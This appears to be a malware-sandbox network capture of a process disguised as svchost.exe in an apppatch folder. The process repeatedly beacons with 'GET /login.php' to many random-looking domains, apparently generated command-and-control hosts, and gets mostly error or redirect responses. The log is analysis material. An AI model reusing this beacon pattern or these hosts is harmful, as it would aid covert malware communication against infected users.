                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599822044 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 09:00:12.600305080 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 09:00:12.600903034 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 09:00:12.601346016 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 09:00:12.602838039 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
Sep 8, 2024 09:00:12.797426939 CEST | 689 | IN | HTTP/1.1 410 Gone
                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 542
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 54042 | 69.162.80.62 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:11.127598047 CEST | 293 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyfyj.com
                                                                                                                                                                                                            Cookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
Sep 8, 2024 09:00:12.599963903 CEST | 772 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            content-length: 481
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            server: nginx
                                                                                                                                                                                                            Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc4NjAxMSwiaWF0IjoxNzI1Nzc4ODExLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqNWJzMXI2MTdhMnE3aGsxOTdoczMiLCJuYmYiOjE3MjU3Nzg4MTEsInRzIjoxNzI1Nzc4ODExNTkyMDcyfQ.E82c0P2hrG2LmDTMCBwILDVtlaljPVneA8HN5jqC4YQ&sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761');</script></body></html>
Sep 8, 2024 09:00:12.600675106 CEST | 772 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            content-length: 481
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            server: nginx
                                                                                                                                                                                                            Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc4NjAxMSwiaWF0IjoxNzI1Nzc4ODExLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqNWJzMXI2MTdhMnE3aGsxOTdoczMiLCJuYmYiOjE3MjU3Nzg4MTEsInRzIjoxNzI1Nzc4ODExNTkyMDcyfQ.E82c0P2hrG2LmDTMCBwILDVtlaljPVneA8HN5jqC4YQ&sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761');</script></body></html>
Sep 8, 2024 09:00:12.601283073 CEST | 772 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                                                                                                                                                                                            cache-control: max-age=0, private, must-revalidate
                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                            content-length: 481
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            server: nginx
                                                                                                                                                                                                            Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc4NjAxMSwiaWF0IjoxNzI1Nzc4ODExLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqNWJzMXI2MTdhMnE3aGsxOTdoczMiLCJuYmYiOjE3MjU3Nzg4MTEsInRzIjoxNzI1Nzc4ODExNTkyMDcyfQ.E82c0P2hrG2LmDTMCBwILDVtlaljPVneA8HN5jqC4YQ&sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761');</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 54046 | 23.253.46.64 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:11.142412901 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Sep 8, 2024 09:00:12.599864006 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:10 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599890947 CEST  169  IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600050926 CEST  169  IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600615025 CEST  1236  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:10 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.601227045 CEST  1236  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:10 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.607739925 CEST  169  IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                                                                                            41          192.168.2.4  54043        188.114.96.3    80                7524  C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205440998 CEST  243  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600665092 CEST  618  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q6nV9uIbceKAcT5oscYip5TyuTCvXfX7Kx1RgXCAY5z3eeiNuiNf%2BB4Xn6mw%2BaGN4TmqjD3aj%2F5sbzRPKwY1wz0rNuhNYWrHrh6xjvAYamxFrmT37pZu7mppdHUK5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0f6439ef4295-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600950956 CEST  173  IN
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600960970 CEST  173  IN
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.601183891 CEST  791  IN  HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Location: https://qegyhig.com/login.php
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q6nV9uIbceKAcT5oscYip5TyuTCvXfX7Kx1RgXCAY5z3eeiNuiNf%2BB4Xn6mw%2BaGN4TmqjD3aj%2F5sbzRPKwY1wz0rNuhNYWrHrh6xjvAYamxFrmT37pZu7mppdHUK5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0f6439ef4295-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                                                                                            42          192.168.2.4  54044        208.100.26.245  80                7524  C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            Timestamp  Bytes transferred  Direction  Data
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205537081 CEST  243  OUT  GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599904060 CEST  744  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600559950 CEST  744  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.600979090 CEST  744  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 09:00:12.601382017 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:11 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 09:00:12.603807926 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com
Sep 8, 2024 09:00:12.724824905 CEST | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 580
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 54045 | 3.64.163.50 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:11.205620050 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 54047 | 154.212.231.82 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:11.215039015 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Sep 8, 2024 09:00:12.601113081 CEST | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 09:00:12.601336002 CEST | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Sep 8, 2024 09:00:12.604195118 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gadyniw.com
Sep 8, 2024 09:00:13.029170036 CEST | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:12 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 54048 | 178.162.203.226 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:11.248603106 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 54049 | 23.253.46.64 | 80 | 7524 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Sep 8, 2024 09:00:12.610716105 CEST | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Sep 8, 2024 09:00:13.127690077 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:12 GMT
                                                                                                                                                                                                            Content-Length: 1245
